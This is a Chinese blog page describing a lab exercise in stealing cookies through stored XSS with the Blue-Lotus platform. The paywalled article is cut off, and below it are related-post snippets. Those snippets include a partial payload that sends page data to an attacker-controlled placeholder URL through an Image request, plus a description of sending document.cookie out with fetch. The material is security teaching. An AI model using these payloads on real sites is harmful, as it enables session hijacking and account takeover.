XSS获取Cookie实验

最新推荐文章于 2025-06-13 23:35:49 发布
原创 最新推荐文章于 2025-06-13 23:35:49 发布 · 608 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#xss #web安全

目录

XSS获取Cookie实验

一、搭建Bule-Lotus平台

二、正式实验

(1)开发XSS实验环境

1、确认实验环境

2、创建数据表xssdata

3、编写服务器接收代码

(2)实现XSS攻击

1、在页面中注入代码

2、获取Cookie后执行

Blue-Lotus完成实验

XSS获取Cookie实验

构建文章阅读系统并完善其发帖的功能之后,搭建Blue-Lotus平台

系统开发我不说了,搭建平台只需将获取得到的源码解压存放在httpd的web根目录下就好了,注意修改web服务的配置文件就好了

一、搭建Bule-Lotus平台

  • 下载好源码,直接去网上搜

  • 要么有LNMP环境,要么直接下载apache服务

  • nginx的配置文件在 /usr/local/nginx/conf/nginx.conf apache的配置文件在 /etc/httpd/conf/httpd.conf,注意修改nginx配置文件中的root或apache配置文件中的DocumentRoot。我在这里使用的是apache的服务。而我搭建的woniunote使用的是nginx,当然,我完全可以把Blue-Lotus也搭建在nginx上

  • 安装php环境

  • 源码放在对应的web服务器根目录就好了

  • 最后直接访问该服务器的ip地址即可

二、正式实验

作为攻击者,我需要事先进入系统发表一篇文章,我在该文章中嵌入我精心构造的js脚本,发表成功之后,当其他用户阅读我这篇文章的时候,一点开,我就可以获得他们的信息,而且他们还要完全不知道,对他们是透明的。一旦获取到他们的细腻些,我就可以通过fiddler或firefox中的http live或bp等来发送请求,更换其中的Cookie字段的值我就可以冒充其他用户了。

(1)开发XSS实验环境

1、确认实验环境

攻击者服务器:192.168.230.150,将获取到的Cookie数据保存到该服务器的数据库中,运行PHP代码暴露一个接收Cookie的URL地址。

正常Web服务器:192.168.230.147,用于用户正常的访问的目标站点,用户在这里可以阅读和发表文章。

用户浏览器:192.168.230.1,Windows环境,使用Chrome浏览器。</

最低0.47元/天 解锁文章

200万优质内容无限畅学
xss获取cookie的方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-27 2097
xss获取cookie简单步骤如下: 1、在存在漏洞的论坛中发日志。 2、然后以管理远登陆,进入后页面会跳转,此时cookie就发送到你的服务器下的code.txt文件中了。 3、这是没有账户前的登陆界面。 4、打开firefox的Tamper Data插件,点击Start Tamper开始抓取信息,刷新登陆界面,然后会跳出对话框,点击Tamper按钮,在途中的cookie一栏中替换掉你抓取到的cookie,单击确定发送请求数据,xss获取cookie 5、替换cookie后不用输用户名密码
DOM型XSS;cookie获取XSS后台使用;XSS钓鱼演示;XSS获取键盘记录实验演示
qq_44696653的博客
04-21 2384
DOM型XSS DOM简介(摘录) 通过JavaScript,可以重构整个HTML文档,可以添加、移除、改变或重排页面上的项目。 要改变页面的某个东西,JavaScript就需要获得对HTML文档中所有元素进行添加、移动、改变或移除的方法和属性,都是通过文档对象模型来获得的(DOM)。 所以就可以将DOM理解为访问HTML的标准编程接口。 DOM型XSS漏洞演示 ...
XSS获取COOKIE
04-20
XSS获取COOKIE
简单的利用XSS获取用户cookie
shy的博客
10-25 4601
跨站脚本攻击(XSS) 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 这里简单的演示下,将cookie获取到自己的搭...
渗透实战:利用XSS获取cookie和密码
最新发布
ericalezl的博客
06-13 763
之后点击轮询可以看到目标向的域名发送的请求,找到一个请求中带有 secret 和 session 字样的就是 cookie 信息。将复制的域名放到 fetch 中,body 为 document.cookie,就是访问这个留言板的用户的 cookie。访问 my-account 转包,将 cookie 替换重放即可登录管理员账户。留言板位置找到注入 xss 的位置后,构造获取对方密码的请求。输入的任何单引号双引号尖括号都会被 unicode 编码。直接换另一种代码执行方式。里面可以执行 js 代码。
xss获取cookie
kiihuang的博客
03-31 988
主要是借助存储型xss漏洞,来进行攻击的,获取每个访问人的cookie
XSS平台与cookie获取
永远是少年
11-21 1386
今天继续给大家介绍渗透测试相关知识,本文主要内容是XSS平台与cookie获取。 一、XSS攻击目的 二、XSS平台 三、XSS攻击获取cookie简介
XSS 盗取 Cookie 实验
m0_63645854的博客
04-01 512
本文主要介绍了XSS盗取Cookie流程
Web应用安全XSS盗取cookiepayload(实验习题).docx
06-17
XSS 盗取 Cookie 是一种常见的 XSS 攻击方式,攻击者通过在网站上注入恶意脚本,获取用户的 Cookie,从而以用户的身份访问网站。 XSS 盗取 Cookie 的流程 1. 攻击者将可以获取并发送管理员的 Cookie 的恶意 XSS ...
使用XSS漏洞获取cookies
Decaede的博客
01-26 1658
使用XSS漏洞获取cookies
04-xss获取cookie实验
tianxiadiiw的博客
05-06 647
攻击者服务器:192.168.74.134,将获取cookie数据保存到该服务器的数据库中,运行PHP代码暴露一个接收Cookie的URL地址。正常Web服务器:192.168.74.133,用于正常的用户访问的目标站点,用户可以在上面阅读或者发表文章。但是只有几分钟的时间进行操作,期间可以查看数据库,建立用户,用户向管理员举报有问题的页面,管理员前去访问,攻击者则直接获取到了管理员的cookie。攻击者在回帖中输入文章内容,并加入JavaScript开始进行xss攻击,3、获取管理员 Cookie
利用XSS获取cookie
热门推荐
littlecjx
11-04 2万+
如果web应用在用户输入的地方没有过滤特殊字符,比如<, >, ', ", <script>, javascript 等字符,而且在变量输出的地方没有使用安全的编码函数,比如PHP的htmlentities()和htmlspecialchars()函数,JavaScript中的escapeJavascript函数,这样的web应用极易出现XSS漏洞。XSS攻击的危害主要有盗取用户cookie、跳转到
网络安全学习:渗透测试钓鱼案例,夯实基础
kali_Ma的博客
09-02 2869
简介 请注意: 本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。 名言: 你对这行的兴趣,决定你在这行的成就! 2021最新整理网络安全\渗透测试/安全学习(全套视频、大厂面经、精品手册、必备工具包)一>戳我拿<一 一、前言 网络钓鱼是社会工程学攻击方式之一,主要是通过对受害者心理弱点、本能反应、好奇心、信任、
XSS获取cookie
qq_40273198的博客
11-21 4774
   DVWA XSS获取cookie 反射型 一、LOW 1.被害者已经登录http://127.0.0.1/DVWA/vulnerabilities/xss_r/ 网站,该网站存在xss漏洞。 网站源代码如下:未进行任何过滤 &lt;?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key...
XSS平台获取cookie
qq_41048303的博客
02-19 3798
XSS平台获取cookie 1.环境介绍 靶场:pikachu XSS平台:BLUE-LOTUS 浏览器:火狐浏览器 2.流程介绍 登录XSS平台,创建获取cookie的脚本 var website = "http://网站地址"; (function() { (new Image()).src = website + '/?keepsession=1&location=' + escape((function() { try { return d
xss -- cookie获取
qq726232111的博客
09-11 732
0x0 cookie 简介 储存在用户本地终端上的数据,服务端可通过session会话获取cookie信息,cookie可用于身份验证,临时存储信息(商城网站的购物车)等 0x1 实验流程 用户点击构造链接 --> 发送cookie到指定服务器 --> 接收cookie保存到文件 0x2 实验环境 实验环境 window+phpstudy+dvwa dvwa中提供...
利用 XSS 获取 Cookie 利用DOM XSS
weixin_71416901的博客
06-21 1425
XSS
本地利用XSS获取cookie
weixin_73049307的博客
09-01 731
呃,这种方法好像不行?后面本来想直接在火狐浏览器中修改cookie值的,但想起来火狐浏览器本来就存有cookie值,所以换成edge浏览器进行下一步操作了。hacker.php(用于生成用户访问而记录的cookie值的cookie.txt文件)修改完成之后直接访问http://127.0.0.1/DVWA/index.php。再退出登录,尝试直接添加cookie值,并访问index.php。hacker.js(用于引导用户访问hacker.php)创建hacker.php和hacker.js并放到。
pikachu xss获取cookie
03-04
### 使用Pikachu平台演示XSS攻击以获取Cookie #### 准备工作 为了成功实施跨站脚本攻击(XSS),并从目标网站窃取用户的Cookies,需要准备两个主要部分。一是拥有能够承载恶意JavaScript代码的服务端;二是存在安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值